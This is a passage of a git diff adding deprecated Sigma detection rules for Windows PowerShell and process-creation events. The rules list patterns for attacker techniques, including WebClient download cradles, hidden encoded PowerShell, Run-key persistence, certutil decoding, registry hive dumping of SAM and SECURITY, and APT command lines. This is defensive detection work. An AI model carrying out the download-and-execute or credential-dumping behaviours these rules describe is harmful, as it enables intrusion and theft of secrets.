https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md +author: frack113 +date: 2021/12/15 +modified: 2023/12/11 +tags: + - attack.discovery + - attack.t1083 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + recurse: + ScriptBlockText|contains: -recurse + condition: ps_script and (selection and recurse) +falsepositives: + - Unknown +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml new file mode 100644 index 000000000..02daa14f3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml @@ -0,0 +1,29 @@ +title: PrintNightmare Powershell Exploitation +id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf +status: deprecated +description: Detects Commandlet name for PrintNightmare exploitation. +references: + - https://github.com/calebstewart/CVE-2021-1675 +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +date: 2021/08/09 +modified: 2023/01/02 +tags: + - attack.privilege_escalation + - attack.t1548 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: Invoke-Nightmare + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml new file mode 100644 index 000000000..71c2bc83e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml @@ -0,0 +1,37 @@ +title: Suspicious Get-WmiObject +id: 0332a266-b584-47b4-933d-a00b103e1b37 +status: deprecated +description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers +references: + - https://attack.mitre.org/datasources/DS0005/ + - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 +author: frack113 +date: 2022/01/12 +modified: 2023/12/11 +tags: + - attack.persistence + - attack.t1546 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: + - Get-WmiObject + - gwmi + filter_cl_utility: + Path|endswith: \CL_Utility.ps1 + ScriptBlockText|contains|all: + - function Get-FreeSpace + - SELECT * FROM Win32_LogicalDisk WHERE MediaType=12 + condition: ps_script and (selection and not 1 of filter_*) +falsepositives: + - Legitimate PowerShell scripts +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml new file mode 100644 index 000000000..6c3973099 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml @@ -0,0 +1,28 @@ +title: Suspicious PowerShell Download +id: 65531a81-a694-4e31-ae04-f8ba5bc33759 +status: deprecated +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 +author: Florian Roth (Nextron Systems) +date: 2017/03/05 +modified: 2022/04/11 +logsource: + product: windows + service: powershell +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + webclient: + - System.Net.WebClient + download: + - .DownloadFile( + - .DownloadString( + condition: powershell and (webclient and download) +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml new file mode 100644 index 000000000..426d3065f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml @@ -0,0 +1,33 @@ +title: Suspicious PowerShell Invocations - Generic +id: 3d304fda-78aa-43ed-975c-d740798a49c1 +status: deprecated +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 +author: Florian Roth (Nextron Systems) +date: 2017/03/12 +modified: 2022/04/11 +logsource: + product: windows + service: powershell +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection_encoded: + - ' -enc ' + - ' -EncodedCommand ' + selection_hidden: + - ' -w hidden ' + - ' -window hidden ' + - ' -windowstyle hidden ' + selection_noninteractive: + - ' -noni ' + - ' -noninteractive ' + condition: powershell and (all of selection*) +falsepositives: + - Very special / sneaky PowerShell scripts +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml new file mode 100644 index 000000000..394405215 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml @@ -0,0 +1,72 @@ +title: Suspicious PowerShell Invocations - Specific +id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c +status: deprecated +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro +date: 2017/03/05 +modified: 2023/05/04 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection_convert_b64: + '|all': + - -nop + - ' -w ' + - hidden + - ' -c ' + - '[Convert]::FromBase64String' + selection_iex: + '|all': + - ' -w ' + - hidden + - -noni + - -nop + - ' -c ' + - iex + - New-Object + selection_enc: + '|all': + - ' -w ' + - hidden + - -ep + - bypass + - -Enc + selection_reg: + '|all': + - powershell + - reg + - add + - HKCU\software\microsoft\windows\currentversion\run + selection_webclient: + '|all': + - bypass + - -noprofile + - -windowstyle + - hidden + - new-object + - system.net.webclient + - .download + selection_iex_webclient: + '|all': + - iex + - New-Object + - Net.WebClient + - .Download + filter_chocolatey: + - (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1 + - (New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1') + - Write-ChocolateyWarning + condition: powershell and (1 of selection_* and not 1 of filter_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml new file mode 100644 index 000000000..5fd87989c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml @@ -0,0 +1,30 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: Ensar Şamil, @sblmsrsn, OSCD Community +date: 2020/10/05 +modified: 2022/04/11 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + service: powershell +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + - SyncAppvPublishingServer.exe + condition: powershell and selection +falsepositives: + - App-V clients +level: medium +status: deprecated +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml new file mode 100644 index 000000000..5ddfecdfc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml @@ -0,0 +1,32 @@ +title: APT29 +id: 033fe7d6-66d1-4240-ac6b-28908009c71f +status: deprecated +description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. +references: + - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ + - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html +author: Florian Roth (Nextron Systems) +date: 2018/12/04 +modified: 2023/03/08 +tags: + - attack.execution + - attack.g0016 + - attack.t1059.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - -noni + - -ep + - bypass + - $ + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml new file mode 100644 index 000000000..59a96c931 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml @@ -0,0 +1,30 @@ +title: CrackMapExecWin +id: 04d9079e-3905-4b70-ad37-6bdf11304965 +status: deprecated +description: Detects CrackMapExecWin Activity as Described by NCSC +references: + - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control + - https://attack.mitre.org/software/S0488/ +author: Markus Neis +date: 2018/04/08 +modified: 2023/03/08 +tags: + - attack.g0035 + - attack.credential_access + - attack.discovery + - attack.t1110 + - attack.t1087 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: \crackmapexec.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml new file mode 100644 index 000000000..f86863770 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml @@ -0,0 +1,36 @@ +title: GALLIUM Artefacts +id: 18739897-21b1-41da-8ee4-5b786915a676 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: deprecated +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +author: Tim Burrell +date: 2020/02/07 +modified: 2023/03/09 +tags: + - attack.credential_access + - attack.t1212 + - attack.command_and_control + - attack.t1071 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + legitimate_process_path: + NewProcessName|contains: + - :\Program Files(x86)\ + - :\Program Files\ + legitimate_executable: + sha1: e570585edc69f9074cb5e8a790708336bd45ca0f + condition: process_creation and (legitimate_executable and not legitimate_process_path) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml new file mode 100644 index 000000000..83edbab98 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml @@ -0,0 +1,31 @@ +title: Hurricane Panda Activity +id: 0eb2107b-a596-422e-b123-b389d5594ed7 +status: deprecated +description: Detects Hurricane Panda Activity +references: + - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ +author: Florian Roth (Nextron Systems) +date: 2019/03/04 +modified: 2023/03/10 +tags: + - attack.privilege_escalation + - attack.g0009 + - attack.t1068 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - localgroup + - admin + - /add + - CommandLine|contains: \Win64.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml new file mode 100644 index 000000000..749980cca --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml @@ -0,0 +1,35 @@ +title: Lazarus Activity Apr21 +id: 4a12fa47-c735-4032-a214-6fab5b120670 +status: deprecated +description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity +references: + - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ +author: Bhabesh Raj +date: 2021/04/20 +modified: 2023/03/10 +tags: + - attack.g0032 + - attack.execution + - attack.t1106 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - mshta # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3 + - .zip + selection_2: + ParentProcessName: C:\Windows\System32\wbem\wmiprvse.exe + NewProcessName: C:\Windows\System32\mshta.exe + selection_3: + ParentProcessName|contains: :\Users\Public\ + NewProcessName: C:\Windows\System32\rundll32.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Should not be any false positives +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml new file mode 100644 index 000000000..3c8c6a8a4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml @@ -0,0 +1,46 @@ +title: Lazarus Loaders +id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e +status: deprecated +description: Detects different loaders as described in various threat reports on Lazarus group activity +references: + - https://www.hvs-consulting.de/lazarus-report/ + - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ +author: Florian Roth (Nextron Systems), wagga +date: 2020/12/23 +modified: 2023/03/10 +tags: + - attack.g0032 + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cmd1: + CommandLine|contains|all: + - 'cmd.exe /c ' + - ' -p 0x' + selection_cmd2: + CommandLine|contains: + - C:\ProgramData\ + - C:\RECYCLER\ + selection_rundll1: + CommandLine|contains|all: + - 'rundll32.exe ' + - C:\ProgramData\ + selection_rundll2: + CommandLine|contains: + - .bin, + - .tmp, + - .dat, + - .io, + - .ini, + - .db, + condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml new file mode 100644 index 000000000..39a87378d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml @@ -0,0 +1,31 @@ +title: DNS Tunnel Technique from MuddyWater +id: 36222790-0d43-4fe8-86e4-674b27809543 +status: deprecated +description: Detecting DNS tunnel activity for Muddywater actor +references: + - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/ + - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html +author: '@caliskanfurkan_' +date: 2020/06/04 +modified: 2023/03/10 +tags: + - attack.command_and_control + - attack.t1071.004 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: DataExchange.dll + NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + ParentProcessName|endswith: \excel.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml new file mode 100644 index 000000000..7597ea71b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml @@ -0,0 +1,30 @@ +title: TA505 Dropper Load Pattern +id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 +status: deprecated +description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents +references: + - https://twitter.com/ForensicITGuy/status/1334734244120309760 +author: Florian Roth (Nextron Systems) +date: 2020/12/08 +modified: 2023/04/05 +tags: + - attack.execution + - attack.g0092 + - attack.t1106 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentProcessName|endswith: \wmiprvse.exe + selection_mshta: + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: mshta.exe + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml new file mode 100644 index 000000000..3a2274af6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml @@ -0,0 +1,57 @@ +title: Suspicious Certutil Command Usage +id: e011a729-98a6-4139-b5c4-bf6f6dd8239a +status: deprecated +description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code +references: + - https://twitter.com/JohnLaTwC/status/835149808817991680 + - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/ + - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/ + - https://twitter.com/egre55/status/1087685529016193025 + - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ +author: Florian Roth (Nextron Systems), juju4, keepwatch +date: 2019/01/16 +modified: 2023/02/15 +tags: + - attack.defense_evasion + - attack.t1140 + - attack.command_and_control + - attack.t1105 + - attack.s0160 + - attack.g0007 + - attack.g0010 + - attack.g0045 + - attack.g0049 + - attack.g0075 + - attack.g0096 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe + selection_cli: + CommandLine|contains: + - ' -decode ' + - ' -decodehex ' + - ' -urlcache ' + - ' -verifyctl ' + - ' -encode ' + - ' -exportPFX ' + - ' /decode ' + - ' /decodehex ' + - ' /urlcache ' + - ' /verifyctl ' + - ' /encode ' + - ' /exportPFX ' + condition: process_creation and (all of selection_*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - False positives depend on scripts and administrative tools used in the monitored environment +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml new file mode 100644 index 000000000..2dcd3b134 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml @@ -0,0 +1,36 @@ +title: Read and Execute a File Via Cmd.exe +id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 +status: deprecated +description: Detect use of "/R <" to read and execute a file via cmd.exe +references: + - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md +author: frack113 +date: 2022/08/20 +modified: 2023/03/07 +tags: + - attack.execution + - attack.t1059.003 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cmd: + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + selection_read: + - ParentCommandLine|contains|all: + - cmd + - '/r ' + - < + - CommandLine|contains|all: + - cmd + - '/r ' + - < + condition: process_creation and (all of selection_*) +falsepositives: + - Legitimate use +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml new file mode 100644 index 000000000..b92f4aded --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml @@ -0,0 +1,31 @@ +title: Cmd Stream Redirection +id: 70e68156-6571-427b-a6e9-4476a173a9b6 +status: deprecated +description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt +author: frack113 +date: 2022/02/04 +modified: 2023/03/07 +tags: + - attack.defense_evasion + - attack.t1564.004 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - '> ' + - ':' + NewProcessName|endswith: \cmd.exe + filter: + CommandLine|contains: ' :\' + condition: process_creation and (selection and not filter) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml new file mode 100644 index 000000000..b4bb7dbcc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml @@ -0,0 +1,35 @@ +title: Credential Acquisition via Registry Hive Dumping +id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 +status: deprecated +description: Detects Credential Acquisition via Registry Hive Dumping +references: + - https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html +author: Tim Rauch +date: 2022/10/04 +modified: 2023/02/06 +tags: + - attack.credential_access + - attack.t1003 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe + selection_2: + CommandLine|contains: + - ' save ' + - ' export ' + selection_3: + CommandLine|contains: + - hklm\sam + - hklm\security + - HKEY_LOCAL_MACHINE\SAM + - HKEY_LOCAL_MACHINE\SECURITY + condition: process_creation and (all of selection_*) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml new file mode 100644 index 000000000..c3eed9b02 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml @@ -0,0 +1,33 @@ +title: Visual Basic Script Execution +id: 23250293-eed5-4c39-b57a-841c8933a57d +status: deprecated +description: Adversaries may abuse Visual Basic (VB) for execution +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md +author: frack113 +date: 2022/01/02 +modified: 2023/03/06 +tags: + - attack.execution + - attack.t1059.005 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_exe: + - OriginalFileName: + - cscript.exe + - wscript.exe + - NewProcessName|endswith: + - \cscript.exe + - \wscript.exe + selection_script: + CommandLine|contains: .vbs + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml new file mode 100644 index 000000000..cde31411b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml @@ -0,0 +1,34 @@ +title: Execution via MSSQL Xp_cmdshell Stored Procedure +id: 344482e4-a477-436c-aa70-7536d18a48c7 +related: + - id: d08dd86f-681e-4a00-a92c-1db218754417 + type: derived + - id: 7f103213-a04e-4d59-8261-213dddf22314 + type: derived +status: deprecated +description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. +references: + - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html +author: Tim Rauch +date: 2022/09/28 +modified: 2023/03/06 +tags: + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + selection_parent: + ParentProcessName|endswith: \sqlservr.exe + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml new file mode 100644 index 000000000..afc86af29 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml @@ -0,0 +1,35 @@ +title: Indirect Command Execution +id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 +status: deprecated +description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md + - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html +author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +date: 2019/10/24 +modified: 2023/01/04 +tags: + - attack.defense_evasion + - attack.t1202 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: + - \pcalua.exe + - \forfiles.exe + condition: process_creation and selection +fields: + - SubjectUserName + - ComputerName + - ParentCommandLine + - CommandLine +falsepositives: + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts. + - Legitimate usage of scripts. +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml new file mode 100644 index 000000000..0610cf5b6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml @@ -0,0 +1,47 @@ +title: Indirect Command Exectuion via Forfiles +id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 +related: + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes +status: deprecated +description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. +references: + - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a + - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ +author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +date: 2022/10/17 +modified: 2023/01/04 +tags: + - attack.defense_evasion + - attack.t1202 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentProcessName|endswith: \forfiles.exe + selection_c: + ParentCommandLine|contains: + - ' /c ' + - ' -c ' + selection_p: + ParentCommandLine|contains: + - ' /p ' + - ' -p ' + selection_m: + ParentCommandLine|contains: + - ' /m ' + - ' -m ' + filter: + CommandLine|contains|all: + - xcopy + - cmd /c del + NewProcessName|endswith: \cmd.exe + condition: process_creation and (all of selection_* and not filter) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml new file mode 100644 index 000000000..6d53806a4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml @@ -0,0 +1,32 @@ +title: Invoke-Obfuscation RUNDLL LAUNCHER +id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555 +status: deprecated +description: Detects Obfuscated Powershell via RUNDLL LAUNCHER +references: + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2023/02/21 +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - rundll32.exe + - shell32.dll + - shellexec_rundll + - powershell + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml 